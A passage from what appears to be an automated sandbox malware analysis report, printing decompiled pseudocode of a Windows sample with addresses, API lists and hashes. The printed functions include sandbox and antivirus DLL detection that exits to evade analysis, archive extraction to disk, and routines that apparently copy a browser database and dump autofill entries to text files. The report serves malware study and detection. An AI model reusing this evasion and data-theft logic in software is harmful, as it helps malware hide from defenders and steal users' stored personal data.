                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t7, L"api_log.dll");
                                                                                				_pop(_t8);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t8, L"dir_watch.dll");
                                                                                				_pop(_t9);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t9, L"pstorec.dll");
                                                                                				_pop(_t10);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t10, L"vmcheck.dll");
                                                                                				_pop(_t11);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t11, L"wpespy.dll");
                                                                                				_pop(_t12);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t12, L"cmdvrt32.dll");
                                                                                				_pop(_t13);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t13, L"cmdvrt64.dll");
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				return _t2;
                                                                                			}















                                                                                0x00401051
                                                                                0x00401056
                                                                                0x00401059
                                                                                0x004010f9
                                                                                0x004010fb
                                                                                0x004010fb
                                                                                0x00401064
                                                                                0x00401069
                                                                                0x0040106c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401077
                                                                                0x0040107c
                                                                                0x0040107f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401086
                                                                                0x0040108b
                                                                                0x0040108e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401095
                                                                                0x0040109a
                                                                                0x0040109d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004010a4
                                                                                0x004010a9
                                                                                0x004010ac
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004010b3
                                                                                0x004010b8
                                                                                0x004010bb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004010c2
                                                                                0x004010c7
                                                                                0x004010ca
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004010d1
                                                                                0x004010d6
                                                                                0x004010d9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004010e0
                                                                                0x004010e5
                                                                                0x004010e8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004010ef
                                                                                0x004010f7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401101

                                                                                APIs
                                                                                • ExitProcess.KERNEL32 ref: 004010FB
                                                                                  • Part of subcall function 00401000: lstrcmpiW.KERNEL32(?,?), ref: 00401032
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcesslstrcmpi
                                                                                • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                • API String ID: 1394296034-3272603366
                                                                                • Opcode ID: 8a112e75be89e0781b1c67a84262aa7006b9202b7b0638c0490da7308202c3fa
                                                                                • Instruction ID: 105192daea2d7df0ef5c5ce74c34fc0b99949b956cd25034320473b509aefa8a
                                                                                • Opcode Fuzzy Hash: 8a112e75be89e0781b1c67a84262aa7006b9202b7b0638c0490da7308202c3fa
                                                                                • Instruction Fuzzy Hash: 1401C629540B8714DD3A2655682775A13144B577EEF3050AFF6C03ADE74FAD04C510AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E004077AF(signed int __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				signed int _v8;
                                                                                				char _v275;
                                                                                				char _v276;
                                                                                				char _v540;
                                                                                				struct _FILETIME _v560;
                                                                                				struct _FILETIME _v568;
                                                                                				struct _FILETIME _v576;
                                                                                				unsigned int _v580;
                                                                                				char _v844;
                                                                                				char _v845;
                                                                                				void* _v852;
                                                                                				signed int _v856;
                                                                                				long _v860;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t91;
                                                                                				intOrPtr _t94;
                                                                                				signed int _t102;
                                                                                				void* _t105;
                                                                                				void* _t106;
                                                                                				void* _t110;
                                                                                				void* _t113;
                                                                                				signed char _t117;
                                                                                				long _t118;
                                                                                				void* _t130;
                                                                                				int _t142;
                                                                                				long _t149;
                                                                                				long _t153;
                                                                                				long _t164;
                                                                                				long _t167;
                                                                                				void* _t175;
                                                                                				void* _t178;
                                                                                				signed int _t184;
                                                                                
                                                                                				_t178 = __edx;
                                                                                				_t91 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t91 ^ _t184;
                                                                                				_t153 = __ecx;
                                                                                				_v856 = __ecx;
                                                                                				_v852 = _a8;
                                                                                				if(_a16 == 3) {
                                                                                					_t94 =  *((intOrPtr*)(__ecx + 4));
                                                                                					_t181 = _a4;
                                                                                					__eflags = _t181 - _t94;
                                                                                					if(_t181 == _t94) {
                                                                                						L13:
                                                                                						_t181 = E00406CCB( *_t153, _a12, _v852,  &_v845);
                                                                                						__eflags = _t181;
                                                                                						if(_t181 <= 0) {
                                                                                							_t179 =  *_t153;
                                                                                							E00406EF9( *_t153);
                                                                                							_t25 = _t153 + 4;
                                                                                							 *_t25 =  *(_t153 + 4) | 0xffffffff;
                                                                                							__eflags =  *_t25;
                                                                                						}
                                                                                						__eflags = _v845;
                                                                                						if(_v845 == 0) {
                                                                                							__eflags = _t181;
                                                                                							if(_t181 <= 0) {
                                                                                								__eflags = _t181 - 0xffffff96;
                                                                                								_t102 = ((0 | _t181 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
                                                                                							} else {
                                                                                								_t102 = 0x600;
                                                                                							}
                                                                                							goto L70;
                                                                                						} else {
                                                                                							L16:
                                                                                							_t102 = 0;
                                                                                							L70:
                                                                                							return E0041DEB4(_t102, _t153, _v8 ^ _t184, _t178, _t179, _t181);
                                                                                						}
                                                                                					}
                                                                                					__eflags = _t94 - 0xffffffff;
                                                                                					if(_t94 != 0xffffffff) {
                                                                                						_t179 =  *__ecx;
                                                                                						E00406EF9( *__ecx);
                                                                                					}
                                                                                					_t105 =  *_t153;
                                                                                					 *(_t153 + 4) =  *(_t153 + 4) | 0xffffffff;
                                                                                					__eflags = _t181 -  *((intOrPtr*)(_t105 + 4));
                                                                                					if(_t181 >=  *((intOrPtr*)(_t105 + 4))) {
                                                                                						L3:
                                                                                						_t102 = 0x10000;
                                                                                						goto L70;
                                                                                					}
                                                                                					__eflags = _t181 -  *((intOrPtr*)(_t105 + 0x10));
                                                                                					if(_t181 <  *((intOrPtr*)(_t105 + 0x10))) {
                                                                                						E00406801(_t105);
                                                                                						_t181 = _a4;
                                                                                					}
                                                                                					_t106 =  *_t153;
                                                                                					__eflags =  *((intOrPtr*)(_t106 + 0x10)) - _t181;
                                                                                					if( *((intOrPtr*)(_t106 + 0x10)) >= _t181) {
                                                                                						L12:
                                                                                						E00406B76( *_t153,  *((intOrPtr*)(_t153 + 0x138)));
                                                                                						_t164 = _v856;
                                                                                						 *((intOrPtr*)(_t164 + 4)) = _a4;
                                                                                						_t153 = _t164;
                                                                                						goto L13;
                                                                                					} else {
                                                                                						do {
                                                                                							E00406836( *_t153);
                                                                                							_t110 =  *_t153;
                                                                                							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - _a4;
                                                                                						} while ( *((intOrPtr*)(_t110 + 0x10)) < _a4);
                                                                                						goto L12;
                                                                                					}
                                                                                				}
                                                                                				if(_a16 == 2 || _a16 == 1) {
                                                                                					__eflags =  *(_t153 + 4) - 0xffffffff;
                                                                                					if( *(_t153 + 4) != 0xffffffff) {
                                                                                						E00406EF9( *_t153);
                                                                                					}
                                                                                					_t181 =  *_t153;
                                                                                					_t179 = _a4;
                                                                                					 *(_t153 + 4) =  *(_t153 + 4) | 0xffffffff;
                                                                                					__eflags = _t179 -  *((intOrPtr*)(_t181 + 4));
                                                                                					if(_t179 >=  *((intOrPtr*)(_t181 + 4))) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						__eflags = _t179 -  *((intOrPtr*)(_t181 + 0x10));
                                                                                						if(_t179 <  *((intOrPtr*)(_t181 + 0x10))) {
                                                                                							E00406801(_t181);
                                                                                						}
                                                                                						while(1) {
                                                                                							_t113 =  *_t153;
                                                                                							__eflags =  *((intOrPtr*)(_t113 + 0x10)) - _t179;
                                                                                							if( *((intOrPtr*)(_t113 + 0x10)) >= _t179) {
                                                                                								break;
                                                                                							}
                                                                                							_t181 =  *_t153;
                                                                                							E00406836( *_t153);
                                                                                						}
                                                                                						_t179 = _v856;
                                                                                						_t153 =  &_v844;
                                                                                						E00406FE6(_t153, _t179, _t178, _t179);
                                                                                						_t117 = _v580 >> 4;
                                                                                						__eflags = _t117 & 0x00000001;
                                                                                						if((_t117 & 0x00000001) == 0) {
                                                                                							__eflags = _a16 - 1;
                                                                                							_v540 = 0;
                                                                                							if(_a16 != 1) {
                                                                                								_t181 = _v852;
                                                                                								_t118 =  *_t181;
                                                                                								_t167 = _t181;
                                                                                								while(1) {
                                                                                									__eflags = _t118;
                                                                                									if(_t118 == 0) {
                                                                                										break;
                                                                                									}
                                                                                									__eflags = _t118 - 0x2f;
                                                                                									if(_t118 == 0x2f) {
                                                                                										L41:
                                                                                										_t153 = _t167 + 1;
                                                                                										L42:
                                                                                										_t167 = _t167 + 1;
                                                                                										__eflags = _t167;
                                                                                										_t118 =  *_t167;
                                                                                										continue;
                                                                                									}
                                                                                									__eflags = _t118 - 0x5c;
                                                                                									if(_t118 != 0x5c) {
                                                                                										goto L42;
                                                                                									}
                                                                                									goto L41;
                                                                                								}
                                                                                								E0041ECF0( &_v276, _t181, 0x104);
                                                                                								__eflags = _t153 - _t181;
                                                                                								if(_t153 != _t181) {
                                                                                									 *((char*)(_t184 + _t153 - _t181 - 0x110)) = 0;
                                                                                									__eflags = _v276 - 0x2f;
                                                                                									if(_v276 == 0x2f) {
                                                                                										L54:
                                                                                										wsprintfA( &_v540, "%s%s",  &_v276, _t153);
                                                                                										_push( &_v276);
                                                                                										_push(0);
                                                                                										E00407659(_t181);
                                                                                										L47:
                                                                                										__eflags = 0;
                                                                                										_t130 = CreateFileA( &_v540, 0x40000000, 0, 0, 2, _v580, 0);
                                                                                										L48:
                                                                                										_v852 = _t130;
                                                                                										__eflags = _t130 - 0xffffffff;
                                                                                										if(_t130 != 0xffffffff) {
                                                                                											_t156 =  *_t179;
                                                                                											E00406B76( *_t179,  *((intOrPtr*)(_t179 + 0x138)));
                                                                                											__eflags =  *(_t179 + 0x13c);
                                                                                											_t181 = 0x4000;
                                                                                											if(__eflags == 0) {
                                                                                												 *(_t179 + 0x13c) = E0041D474(_t156, _t178, _t179, 0x4000, __eflags, 0x4000);
                                                                                											}
                                                                                											_t71 =  &_v856;
                                                                                											 *_t71 = _v856 & 0x00000000;
                                                                                											__eflags =  *_t71;
                                                                                											while(1) {
                                                                                												_t153 = E00406CCB( *_t179, _t181,  *(_t179 + 0x13c),  &_v845);
                                                                                												__eflags = _t153 - 0xffffff96;
                                                                                												if(_t153 == 0xffffff96) {
                                                                                													break;
                                                                                												}
                                                                                												__eflags = _t153;
                                                                                												if(__eflags < 0) {
                                                                                													L64:
                                                                                													_v856 = 0x5000000;
                                                                                													L65:
                                                                                													E00406EF9(_t179);
                                                                                													__eflags = _v856;
                                                                                													if(_v856 == 0) {
                                                                                														SetFileTime(_v852,  &_v568,  &_v576,  &_v560);
                                                                                													}
                                                                                													__eflags = _a16 - 1;
                                                                                													if(_a16 != 1) {
                                                                                														CloseHandle(_v852);
                                                                                													}
                                                                                													_t102 = _v856;
                                                                                													goto L70;
                                                                                												}
                                                                                												if(__eflags <= 0) {
                                                                                													L62:
                                                                                													__eflags = _v845;
                                                                                													if(_v845 != 0) {
                                                                                														goto L65;
                                                                                													}
                                                                                													__eflags = _t153;
                                                                                													if(_t153 != 0) {
                                                                                														continue;
                                                                                													}
                                                                                													goto L64;
                                                                                												}
                                                                                												_t142 = WriteFile(_v852,  *(_t179 + 0x13c), _t153,  &_v860, 0);
                                                                                												__eflags = _t142;
                                                                                												if(_t142 == 0) {
                                                                                													_v856 = 0x400;
                                                                                													goto L65;
                                                                                												}
                                                                                												goto L62;
                                                                                											}
                                                                                											_v856 = 0x1000;
                                                                                											goto L65;
                                                                                										}
                                                                                										_t102 = 0x200;
                                                                                										goto L70;
                                                                                									}
                                                                                									__eflags = _v276 - 0x5c;
                                                                                									if(_v276 == 0x5c) {
                                                                                										goto L54;
                                                                                									}
                                                                                									__eflags = _v276;
                                                                                									if(_v276 == 0) {
                                                                                										L46:
                                                                                										_t181 = _t179 + 0x140;
                                                                                										wsprintfA( &_v540, "%s%s%s", _t181,  &_v276, _t153);
                                                                                										_push( &_v276);
                                                                                										_push(_t181);
                                                                                										E00407659(_t181);
                                                                                										goto L47;
                                                                                									}
                                                                                									__eflags = _v275 - 0x3a;
                                                                                									if(_v275 != 0x3a) {
                                                                                										goto L46;
                                                                                									}
                                                                                									goto L54;
                                                                                								}
                                                                                								_v276 = 0;
                                                                                								goto L46;
                                                                                							}
                                                                                							_t130 = _v852;
                                                                                							goto L48;
                                                                                						}
                                                                                						__eflags = _a16 - 1;
                                                                                						if(_a16 == 1) {
                                                                                							goto L16;
                                                                                						}
                                                                                						_t175 = _v852;
                                                                                						_t149 =  *_t175;
                                                                                						__eflags = _t149 - 0x2f;
                                                                                						if(_t149 == 0x2f) {
                                                                                							L33:
                                                                                							_push(_t175);
                                                                                							_push(0);
                                                                                							L35:
                                                                                							E00407659(_t181);
                                                                                							goto L16;
                                                                                						}
                                                                                						__eflags = _t149 - 0x5c;
                                                                                						if(_t149 == 0x5c) {
                                                                                							goto L33;
                                                                                						}
                                                                                						__eflags = _t149;
                                                                                						if(_t149 == 0) {
                                                                                							L34:
                                                                                							_push(_t175);
                                                                                							_t179 = _t179 + 0x140;
                                                                                							__eflags = _t179;
                                                                                							_push(_t179);
                                                                                							goto L35;
                                                                                						}
                                                                                						__eflags =  *((char*)(_t175 + 1)) - 0x3a;
                                                                                						if( *((char*)(_t175 + 1)) != 0x3a) {
                                                                                							goto L34;
                                                                                						}
                                                                                						goto L33;
                                                                                					}
                                                                                				} else {
                                                                                					goto L3;
                                                                                				}
                                                                                			}





































                                                                                0x004077af
                                                                                0x004077b8
                                                                                0x004077bf
                                                                                0x004077cb
                                                                                0x004077ce
                                                                                0x004077d4
                                                                                0x004077da
                                                                                0x004077fa
                                                                                0x004077fd
                                                                                0x00407800
                                                                                0x00407802
                                                                                0x0040785e
                                                                                0x00407875
                                                                                0x00407879
                                                                                0x0040787b
                                                                                0x0040787d
                                                                                0x0040787f
                                                                                0x00407884
                                                                                0x00407884
                                                                                0x00407884
                                                                                0x00407884
                                                                                0x00407888
                                                                                0x0040788f
                                                                                0x00407898
                                                                                0x0040789a
                                                                                0x004078a8
                                                                                0x004078b4
                                                                                0x0040789c
                                                                                0x0040789c
                                                                                0x0040789c
                                                                                0x00000000
                                                                                0x00407891
                                                                                0x00407891
                                                                                0x00407891
                                                                                0x00407b55
                                                                                0x00407b63
                                                                                0x00407b63
                                                                                0x0040788f
                                                                                0x00407804
                                                                                0x00407807
                                                                                0x00407809
                                                                                0x0040780b
                                                                                0x0040780b
                                                                                0x00407810
                                                                                0x00407812
                                                                                0x00407816
                                                                                0x00407819
                                                                                0x004077f0
                                                                                0x004077f0
                                                                                0x00000000
                                                                                0x004077f0
                                                                                0x0040781b
                                                                                0x0040781e
                                                                                0x00407822
                                                                                0x00407827
                                                                                0x00407827
                                                                                0x0040782a
                                                                                0x0040782c
                                                                                0x0040782f
                                                                                0x00407842
                                                                                0x0040784a
                                                                                0x00407853
                                                                                0x00407859
                                                                                0x0040785c
                                                                                0x00000000
                                                                                0x00407831
                                                                                0x00407831
                                                                                0x00407833
                                                                                0x00407838
                                                                                0x0040783d
                                                                                0x0040783d
                                                                                0x00000000
                                                                                0x00407831
                                                                                0x0040782f
                                                                                0x004077e0
                                                                                0x004078be
                                                                                0x004078c2
                                                                                0x004078c6
                                                                                0x004078c6
                                                                                0x004078cb
                                                                                0x004078cd
                                                                                0x004078d0
                                                                                0x004078d4
                                                                                0x004078d7
                                                                                0x00000000
                                                                                0x004078dd
                                                                                0x004078dd
                                                                                0x004078e0
                                                                                0x004078e2
                                                                                0x004078e2
                                                                                0x004078f0
                                                                                0x004078f0
                                                                                0x004078f2
                                                                                0x004078f5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004078e9
                                                                                0x004078eb
                                                                                0x004078eb
                                                                                0x004078f8
                                                                                0x004078fe
                                                                                0x00407906
                                                                                0x00407911
                                                                                0x00407914
                                                                                0x00407916
                                                                                0x00407955
                                                                                0x00407959
                                                                                0x00407960
                                                                                0x0040796d
                                                                                0x00407973
                                                                                0x00407977
                                                                                0x00407989
                                                                                0x00407989
                                                                                0x0040798b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040797b
                                                                                0x0040797d
                                                                                0x00407983
                                                                                0x00407983
                                                                                0x00407986
                                                                                0x00407986
                                                                                0x00407986
                                                                                0x00407987
                                                                                0x00000000
                                                                                0x00407987
                                                                                0x0040797f
                                                                                0x00407981
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407981
                                                                                0x0040799a
                                                                                0x004079a2
                                                                                0x004079a4
                                                                                0x00407a18
                                                                                0x00407a20
                                                                                0x00407a27
                                                                                0x00407a4c
                                                                                0x00407a60
                                                                                0x00407a6c
                                                                                0x00407a6d
                                                                                0x00407a6f
                                                                                0x004079e0
                                                                                0x004079e0
                                                                                0x004079f9
                                                                                0x004079ff
                                                                                0x004079ff
                                                                                0x00407a05
                                                                                0x00407a08
                                                                                0x00407a82
                                                                                0x00407a84
                                                                                0x00407a89
                                                                                0x00407a91
                                                                                0x00407a96
                                                                                0x00407a9f
                                                                                0x00407a9f
                                                                                0x00407aa5
                                                                                0x00407aa5
                                                                                0x00407aa5
                                                                                0x00407aac
                                                                                0x00407ac2
                                                                                0x00407ac6
                                                                                0x00407ac9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407acf
                                                                                0x00407ad1
                                                                                0x00407b02
                                                                                0x00407b02
                                                                                0x00407b0c
                                                                                0x00407b0e
                                                                                0x00407b13
                                                                                0x00407b1a
                                                                                0x00407b37
                                                                                0x00407b37
                                                                                0x00407b3d
                                                                                0x00407b41
                                                                                0x00407b49
                                                                                0x00407b49
                                                                                0x00407b4f
                                                                                0x00000000
                                                                                0x00407b4f
                                                                                0x00407ad3
                                                                                0x00407af5
                                                                                0x00407af5
                                                                                0x00407afc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407afe
                                                                                0x00407b00
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407b00
                                                                                0x00407aeb
                                                                                0x00407af1
                                                                                0x00407af3
                                                                                0x00407b72
                                                                                0x00000000
                                                                                0x00407b72
                                                                                0x00000000
                                                                                0x00407af3
                                                                                0x00407b66
                                                                                0x00000000
                                                                                0x00407b66
                                                                                0x00407a0a
                                                                                0x00000000
                                                                                0x00407a0a
                                                                                0x00407a29
                                                                                0x00407a30
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407a32
                                                                                0x00407a39
                                                                                0x004079ad
                                                                                0x004079b5
                                                                                0x004079c8
                                                                                0x004079d7
                                                                                0x004079d8
                                                                                0x004079d9
                                                                                0x00000000
                                                                                0x004079df
                                                                                0x00407a3f
                                                                                0x00407a46
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407a46
                                                                                0x004079a6
                                                                                0x00000000
                                                                                0x004079a6
                                                                                0x00407962
                                                                                0x00000000
                                                                                0x00407962
                                                                                0x00407918
                                                                                0x0040791c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407922
                                                                                0x00407928
                                                                                0x0040792a
                                                                                0x0040792c
                                                                                0x0040793c
                                                                                0x0040793c
                                                                                0x0040793d
                                                                                0x00407949
                                                                                0x00407949
                                                                                0x00000000
                                                                                0x0040794f
                                                                                0x0040792e
                                                                                0x00407930
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407932
                                                                                0x00407934
                                                                                0x00407941
                                                                                0x00407941
                                                                                0x00407942
                                                                                0x00407942
                                                                                0x00407948
                                                                                0x00000000
                                                                                0x00407948
                                                                                0x00407936
                                                                                0x0040793a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040793a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • SetFileTime.KERNEL32(?,?,?,?), ref: 00407B37
                                                                                • CloseHandle.KERNEL32(?), ref: 00407B49
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandleTime
                                                                                • String ID: %s%s$%s%s%s$:$\
                                                                                • API String ID: 2100898393-1100577047
                                                                                • Opcode ID: aa539f52d09809f5e520ba1ca1a4bc351e0559bc9420136e165d0b5d0603cb49
                                                                                • Instruction ID: bae9a44b4bbb3d78642945d3c842c007b3f1b3f990181fddbe23d32488162066
                                                                                • Opcode Fuzzy Hash: aa539f52d09809f5e520ba1ca1a4bc351e0559bc9420136e165d0b5d0603cb49
                                                                                • Instruction Fuzzy Hash: 78B1C331D086189FDF259B28CC897EA7778AB05314F0401BBE419B72D1D778BE85CB9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00410396(CHAR* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				void* _t39;
                                                                                				int _t41;
                                                                                				void* _t44;
                                                                                				void* _t49;
                                                                                				void* _t50;
                                                                                				void* _t55;
                                                                                				void* _t57;
                                                                                				void* _t68;
                                                                                				CHAR* _t69;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                				intOrPtr _t74;
                                                                                				void* _t75;
                                                                                				void* _t76;
                                                                                				signed int _t77;
                                                                                				void* _t79;
                                                                                				void* _t81;
                                                                                				void* _t83;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t77 = _t79 - 0x198;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				 *(_t77 + 0x194) = _t24 ^ _t77;
                                                                                				 *((intOrPtr*)(_t77 - 0x80)) =  *((intOrPtr*)(_t77 + 0x1a0));
                                                                                				_t69 = __ecx;
                                                                                				_t56 = __edx;
                                                                                				GetCurrentDirectoryA(0x104, _t77 + 0x90);
                                                                                				 *0x44a1b8(_t77 + 0x90, "\\temp", _t68, _t72, _t55);
                                                                                				CopyFileA(_t69, _t77 + 0x90, 1);
                                                                                				E00427E30(_t77 - 0x74, 0, 0x104);
                                                                                				wsprintfA(_t77 - 0x74, "Autofill\\%s_%s.txt",  *((intOrPtr*)(_t77 - 0x80)), _t56);
                                                                                				_t74 =  *0x449fa4; // 0x146f710
                                                                                				_t39 =  *0x44a0a4(_t77 + 0x90, _t77 - 0x7c);
                                                                                				_t81 = _t79 - 0x218 + 0x24;
                                                                                				if(_t39 == 0) {
                                                                                					_t44 =  *0x44a058( *((intOrPtr*)(_t77 - 0x7c)), _t74, 0xffffffff, _t77 - 0x78, 0);
                                                                                					_t83 = _t81 + 0x14;
                                                                                					if(_t44 == 0) {
                                                                                						_t76 = E00420300(_t77 - 0x74, "w");
                                                                                						if(_t76 != 0) {
                                                                                							_t49 =  *0x44a074( *((intOrPtr*)(_t77 - 0x78)));
                                                                                							while(1) {
                                                                                								_t87 = _t49 - 0x64;
                                                                                								if(_t49 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								_t50 =  *0x44a094( *((intOrPtr*)(_t77 - 0x78)), 0);
                                                                                								_t56 = _t50;
                                                                                								E0041E879(_t50, 0, _t76, __eflags);
                                                                                								E0041E879(_t50, 0, _t76, __eflags);
                                                                                								_t49 =  *0x44a074( *((intOrPtr*)(_t77 - 0x78)), _t76, "\n", _t76, "%s\t%s", _t50,  *0x44a094( *((intOrPtr*)(_t77 - 0x78)), 1));
                                                                                								_t83 = _t83 + 0x2c;
                                                                                							}
                                                                                							_push(_t76);
                                                                                							E0041EAA2(_t56, 0, _t76, _t87);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t77 - 0x78)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t77 - 0x7c)));
                                                                                				}
                                                                                				_t41 = DeleteFileA(_t77 + 0x90);
                                                                                				_pop(_t71);
                                                                                				_pop(_t75);
                                                                                				_pop(_t57);
                                                                                				return E0041DEB4(_t41, _t57,  *(_t77 + 0x194) ^ _t77, _t67, _t71, _t75);
                                                                                			}


























                                                                                0x00410396
                                                                                0x00410397
                                                                                0x004103a4
                                                                                0x004103ab
                                                                                0x004103ba
                                                                                0x004103ca
                                                                                0x004103cc
                                                                                0x004103ce
                                                                                0x004103e0
                                                                                0x004103f0
                                                                                0x004103fe
                                                                                0x00410410
                                                                                0x00410416
                                                                                0x00410427
                                                                                0x0041042d
                                                                                0x00410432
                                                                                0x00410443
                                                                                0x00410449
                                                                                0x0041044e
                                                                                0x0041045e
                                                                                0x00410464
                                                                                0x00410469
                                                                                0x004104ad
                                                                                0x004104ad
                                                                                0x004104b0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410476
                                                                                0x00410481
                                                                                0x00410491
                                                                                0x0041049c
                                                                                0x004104a4
                                                                                0x004104aa
                                                                                0x004104aa
                                                                                0x004104b2
                                                                                0x004104b3
                                                                                0x004104b8
                                                                                0x00410464
                                                                                0x004104bc
                                                                                0x004104c5
                                                                                0x004104cc
                                                                                0x004104d4
                                                                                0x004104e0
                                                                                0x004104e1
                                                                                0x004104e4
                                                                                0x004104f1

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetlstrcatwsprintf
                                                                                • String ID: %s%s$Autofill\%s_%s.txt$\temp
                                                                                • API String ID: 3845412190-2986410175
                                                                                • Opcode ID: afb33ac798dc529709ba16af11e33561febff521979628848d7b6ff8e3f824ac
                                                                                • Instruction ID: bdc1ab48cfcf09882a5d0912b9779bd571f494cf2b0314aa1fdabfb6de3e3664
                                                                                • Opcode Fuzzy Hash: afb33ac798dc529709ba16af11e33561febff521979628848d7b6ff8e3f824ac
                                                                                • Instruction Fuzzy Hash: 48317576900118AFEB209FB5EC49EDE7BBCEF09314F10013AFA09E3151DB7959948B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 22%
                                                                                			E004104F2(void* __ebx, CHAR* __ecx, void* __edx) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				void* _t39;
                                                                                				int _t41;
                                                                                				void* _t44;
                                                                                				void* _t49;
                                                                                				void* _t64;
                                                                                				void* _t65;
                                                                                				CHAR* _t66;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t69;
                                                                                				void* _t72;
                                                                                				signed int _t73;
                                                                                				void* _t75;
                                                                                				void* _t77;
                                                                                				void* _t79;
                                                                                
                                                                                				_t64 = __edx;
                                                                                				_t54 = __ebx;
                                                                                				_t73 = _t75 - 0x198;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				 *(_t73 + 0x194) = _t24 ^ _t73;
                                                                                				 *((intOrPtr*)(_t73 - 0x80)) =  *((intOrPtr*)(_t73 + 0x1a0));
                                                                                				_t66 = __ecx;
